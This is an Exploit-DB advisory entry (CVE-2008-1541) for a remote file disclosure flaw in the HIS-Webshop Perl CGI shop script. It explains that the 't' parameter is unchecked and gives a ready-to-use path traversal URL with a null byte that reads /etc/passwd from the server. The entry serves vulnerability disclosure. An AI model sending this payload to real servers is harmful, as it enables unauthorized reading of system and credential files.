HIS-Webshop his-webshop.pl t Remote File Disclosure Vulnerability

2008-03-24T00:00:00
ID EDB-ID:5304
Type exploitdb
Reporter Zero X
Modified 2008-03-24T00:00:00

Description

HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability. CVE-2008-1541. Webapps exploit for cgi platform

                                        
                                            HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn´t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>

# milw0rm.com [2008-03-24]